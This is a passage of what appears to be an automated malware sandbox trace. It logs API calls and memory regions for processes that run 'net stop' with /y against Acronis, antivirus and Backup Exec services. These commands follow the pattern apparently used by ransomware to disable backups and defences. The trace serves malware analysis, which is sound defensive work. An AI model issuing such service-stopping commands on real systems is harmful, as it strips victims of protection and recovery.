_String2="ACRONISAGENT") returned 11 [0088.703] _wcsicmp (_String1="alerter", _String2="ACRONISAGENT") returned 9 [0088.703] _wcsicmp (_String1="netlogon", _String2="ACRONISAGENT") returned 13 [0088.703] NetServiceControl (in: servername=0x0, service="ACRONISAGENT", opcode=0x0, arg=0x0, bufptr=0x14fab0 | out: bufptr=0x14fab0) returned 0x889 [0088.704] wcscpy_s (in: _Destination=0xfffb80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.704] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0088.705] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xfffb5b50, nSize=0x800, Arguments=0xfffb7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0088.706] GetFileType (hFile=0xb) returned 0x2 [0088.707] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f978 | out: lpMode=0x14f978) returned 1 [0088.707] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffb5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f970, lpReserved=0x0 | out: lpBuffer=0xfffb5b50*, lpNumberOfCharsWritten=0x14f970*=0x1e) returned 1 [0088.707] GetFileType (hFile=0xb) returned 0x2 [0088.707] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f978 | out: lpMode=0x14f978) returned 1 [0088.707] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff91efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f970, lpReserved=0x0 | out: lpBuffer=0xfff91efc*, lpNumberOfCharsWritten=0x14f970*=0x2) returned 1 [0088.708] _ultow (in: _Dest=0x889, _Radix=1374688 | out: _Dest=0x889) returned="2185" [0088.708] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xfffb5b50, nSize=0x800, Arguments=0xfffb7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0088.708] GetFileType (hFile=0xb) returned 0x2 [0088.708] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f978 | out: lpMode=0x14f978) returned 1 [0088.708] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffb5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f970, lpReserved=0x0 | out: lpBuffer=0xfffb5b50*, lpNumberOfCharsWritten=0x14f970*=0x34) returned 1 [0088.708] GetFileType (hFile=0xb) returned 0x2 [0088.709] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f978 | out: lpMode=0x14f978) returned 1 [0088.709] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff91efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f970, lpReserved=0x0 | out: lpBuffer=0xfff91efc*, lpNumberOfCharsWritten=0x14f970*=0x2) returned 1 [0088.709] NetApiBufferFree (Buffer=0x254d50) returned 0x0 [0088.709] NetApiBufferFree (Buffer=0x25c100) returned 0x0 [0088.709] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent /y" [0088.709] exit (_Code=2) Process: id = "90" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2058e000" os_pid = "0x10dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "84" os_parent_pid = "0x1068" cmd_line = "C:\\Windows\\system32\\net1 stop Antivirus /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4818 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4819 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4820 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4821 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4822 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4823 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4824 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4825 start_va = 0xfff90000 end_va = 0xfffc2fff entry_point = 0xfff90000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4826 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4827 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4828 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4829 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4846 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4847 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4848 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4849 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4850 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4851 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4852 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4853 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4854 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4855 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4856 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4857 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4858 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4859 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4860 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4861 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4862 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4863 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4864 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4865 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4866 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4867 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4868 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4869 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4870 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4871 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4872 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 481 os_tid = 0x10e0 [0088.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe90 | out: lpSystemTimeAsFileTime=0x28fe90*(dwLowDateTime=0xea33c590, dwHighDateTime=0x1d48689)) [0088.976] GetCurrentProcessId () returned 0x10dc [0088.976] GetCurrentThreadId () returned 0x10e0 [0088.976] GetTickCount () returned 0x20176 [0088.976] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe98 | out: lpPerformanceCount=0x28fe98*=1813589400000) returned 1 [0088.977] GetModuleHandleW (lpModuleName=0x0) returned 0xfff90000 [0088.977] __set_app_type (_Type=0x1) [0088.977] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffa9c9c) returned 0x0 [0088.977] __getmainargs (in: _Argc=0xfffb4780, _Argv=0xfffb4790, _Env=0xfffb4788, _DoWildCard=0, _StartInfo=0xfffb479c | out: _Argc=0xfffb4780, _Argv=0xfffb4790, _Env=0xfffb4788) returned 0 [0088.978] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.978] GetConsoleOutputCP () returned 0x1b5 [0088.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfffbcec0 | out: lpCPInfo=0xfffbcec0) returned 1 [0088.978] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0088.979] sprintf_s (in: _DstBuf=0x28fe38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.980] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0088.981] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0088.981] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Antivirus /y" [0088.981] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fbd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0088.981] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.981] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fe28 | out: Buffer=0x28fe28*=0x444d50) returned 0x0 [0088.981] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fe28 | out: Buffer=0x28fe28*=0x44c0f0) returned 0x0 [0088.981] _fileno (_File=0x7fefdba2a80) returned 0 [0088.981] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0088.981] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0088.981] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0088.981] _wcsicmp (_String1="config", _String2="stop") returned -16 [0088.981] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0088.982] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0088.982] _wcsicmp (_String1="file", _String2="stop") returned -13 [0088.982] _wcsicmp (_String1="files", _String2="stop") returned -13 [0088.982] _wcsicmp (_String1="group", _String2="stop") returned -12 [0088.982] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0088.982] _wcsicmp (_String1="help", _String2="stop") returned -11 [0088.982] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0088.982] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0088.982] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0088.982] _wcsicmp (_String1="session", _String2="stop") returned -15 [0088.982] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0088.982] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0088.982] _wcsicmp (_String1="share", _String2="stop") returned -12 [0088.982] _wcsicmp (_String1="start", _String2="stop") returned -14 [0088.982] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0088.982] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0088.982] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0088.982] _wcsicmp (_String1="accounts", _String2="Antivirus") returned -11 [0088.982] _wcsicmp (_String1="computer", _String2="Antivirus") returned 2 [0088.982] _wcsicmp (_String1="config", _String2="Antivirus") returned 2 [0088.982] _wcsicmp (_String1="continue", _String2="Antivirus") returned 2 [0088.982] _wcsicmp (_String1="cont", _String2="Antivirus") returned 2 [0088.982] _wcsicmp (_String1="file", _String2="Antivirus") returned 5 [0088.982] _wcsicmp (_String1="files", _String2="Antivirus") returned 5 [0088.982] _wcsicmp (_String1="group", _String2="Antivirus") returned 6 [0088.982] _wcsicmp (_String1="groups", _String2="Antivirus") returned 6 [0088.982] _wcsicmp (_String1="help", _String2="Antivirus") returned 7 [0088.982] _wcsicmp (_String1="helpmsg", _String2="Antivirus") returned 7 [0088.982] _wcsicmp (_String1="localgroup", _String2="Antivirus") returned 11 [0088.982] _wcsicmp (_String1="pause", _String2="Antivirus") returned 15 [0088.982] _wcsicmp (_String1="session", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="sessions", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="sess", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="share", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="start", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="stats", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="statistics", _String2="Antivirus") returned 18 [0088.982] _wcsicmp (_String1="stop", _String2="Antivirus") returned 18 [0088.983] _wcsicmp (_String1="time", _String2="Antivirus") returned 19 [0088.983] _wcsicmp (_String1="user", _String2="Antivirus") returned 20 [0088.983] _wcsicmp (_String1="users", _String2="Antivirus") returned 20 [0088.983] _wcsicmp (_String1="msg", _String2="Antivirus") returned 12 [0088.983] _wcsicmp (_String1="messenger", _String2="Antivirus") returned 12 [0088.983] _wcsicmp (_String1="receiver", _String2="Antivirus") returned 17 [0088.983] _wcsicmp (_String1="rcv", _String2="Antivirus") returned 17 [0088.983] _wcsicmp (_String1="netpopup", _String2="Antivirus") returned 13 [0088.983] _wcsicmp (_String1="redirector", _String2="Antivirus") returned 17 [0088.983] _wcsicmp (_String1="redir", _String2="Antivirus") returned 17 [0088.983] _wcsicmp (_String1="rdr", _String2="Antivirus") returned 17 [0088.983] _wcsicmp (_String1="workstation", _String2="Antivirus") returned 22 [0088.983] _wcsicmp (_String1="work", _String2="Antivirus") returned 22 [0088.983] _wcsicmp (_String1="wksta", _String2="Antivirus") returned 22 [0088.983] _wcsicmp (_String1="prdr", _String2="Antivirus") returned 15 [0088.983] _wcsicmp (_String1="devrdr", _String2="Antivirus") returned 3 [0088.983] _wcsicmp (_String1="lanmanworkstation", _String2="Antivirus") returned 11 [0088.983] _wcsicmp (_String1="server", _String2="Antivirus") returned 18 [0088.983] _wcsicmp (_String1="svr", _String2="Antivirus") returned 18 [0088.983] _wcsicmp (_String1="srv", _String2="Antivirus") returned 18 [0088.983] _wcsicmp (_String1="lanmanserver", _String2="Antivirus") returned 11 [0088.983] _wcsicmp (_String1="alerter", _String2="Antivirus") returned -2 [0088.983] _wcsicmp (_String1="netlogon", _String2="Antivirus") returned 13 [0088.983] _wcsupr (in: _String="Antivirus" | out: _String="ANTIVIRUS") returned="ANTIVIRUS" [0088.983] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x44ce00 [0088.986] GetServiceKeyNameW (in: hSCManager=0x44ce00, lpDisplayName="ANTIVIRUS", lpServiceName=0xfffb5750, lpcchBuffer=0x28fd48 | out: lpServiceName="", lpcchBuffer=0x28fd48) returned 0 [0088.988] _wcsicmp (_String1="msg", _String2="ANTIVIRUS") returned 12 [0088.988] _wcsicmp (_String1="messenger", _String2="ANTIVIRUS") returned 12 [0088.988] _wcsicmp (_String1="receiver", _String2="ANTIVIRUS") returned 17 [0088.988] _wcsicmp (_String1="rcv", _String2="ANTIVIRUS") returned 17 [0088.988] _wcsicmp (_String1="redirector", _String2="ANTIVIRUS") returned 17 [0088.988] _wcsicmp (_String1="redir", _String2="ANTIVIRUS") returned 17 [0088.988] _wcsicmp (_String1="rdr", _String2="ANTIVIRUS") returned 17 [0088.988] _wcsicmp (_String1="workstation", _String2="ANTIVIRUS") returned 22 [0088.988] _wcsicmp (_String1="work", _String2="ANTIVIRUS") returned 22 [0088.988] _wcsicmp (_String1="wksta", _String2="ANTIVIRUS") returned 22 [0088.988] _wcsicmp (_String1="prdr", _String2="ANTIVIRUS") returned 15 [0088.988] _wcsicmp (_String1="devrdr", _String2="ANTIVIRUS") returned 3 [0088.988] _wcsicmp (_String1="lanmanworkstation", _String2="ANTIVIRUS") returned 11 [0088.988] _wcsicmp (_String1="server", _String2="ANTIVIRUS") returned 18 [0088.988] _wcsicmp (_String1="svr", _String2="ANTIVIRUS") returned 18 [0088.988] _wcsicmp (_String1="srv", _String2="ANTIVIRUS") returned 18 [0088.988] _wcsicmp (_String1="lanmanserver", _String2="ANTIVIRUS") returned 11 [0088.988] _wcsicmp (_String1="alerter", _String2="ANTIVIRUS") returned -2 [0088.988] _wcsicmp (_String1="netlogon", _String2="ANTIVIRUS") returned 13 [0088.988] NetServiceControl (in: servername=0x0, service="ANTIVIRUS", opcode=0x0, arg=0x0, bufptr=0x28fd50 | out: bufptr=0x28fd50) returned 0x889 [0088.989] wcscpy_s (in: _Destination=0xfffb80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.989] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0088.990] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xfffb5b50, nSize=0x800, Arguments=0xfffb7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0088.991] GetFileType (hFile=0xb) returned 0x2 [0089.037] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fc18 | out: lpMode=0x28fc18) returned 1 [0089.038] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffb5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fc10, lpReserved=0x0 | out: lpBuffer=0xfffb5b50*, lpNumberOfCharsWritten=0x28fc10*=0x1e) returned 1 [0089.038] GetFileType (hFile=0xb) returned 0x2 [0089.038] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fc18 | out: lpMode=0x28fc18) returned 1 [0089.038] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff91efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fc10, lpReserved=0x0 | out: lpBuffer=0xfff91efc*, lpNumberOfCharsWritten=0x28fc10*=0x2) returned 1 [0089.039] _ultow (in: _Dest=0x889, _Radix=2686080 | out: _Dest=0x889) returned="2185" [0089.039] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xfffb5b50, nSize=0x800, Arguments=0xfffb7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0089.039] GetFileType (hFile=0xb) returned 0x2 [0089.039] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fc18 | out: lpMode=0x28fc18) returned 1 [0089.040] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffb5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fc10, lpReserved=0x0 | out: lpBuffer=0xfffb5b50*, lpNumberOfCharsWritten=0x28fc10*=0x34) returned 1 [0089.040] GetFileType (hFile=0xb) returned 0x2 [0089.040] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fc18 | out: lpMode=0x28fc18) returned 1 [0089.040] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff91efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fc10, lpReserved=0x0 | out: lpBuffer=0xfff91efc*, lpNumberOfCharsWritten=0x28fc10*=0x2) returned 1 [0089.041] NetApiBufferFree (Buffer=0x444d50) returned 0x0 [0089.041] NetApiBufferFree (Buffer=0x44c0f0) returned 0x0 [0089.041] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Antivirus /y" [0089.041] exit (_Code=2) Process: id = "91" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1fc58000" os_pid = "0x10ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4830 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4831 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4832 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4833 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4834 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4835 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4836 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4837 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4838 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4839 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4840 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4841 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4842 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4843 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4844 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 482 os_tid = 0x10f0 Process: id = "92" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1aa78000" os_pid = "0x1108" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4873 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4874 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4875 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4876 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4877 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4878 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4879 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = 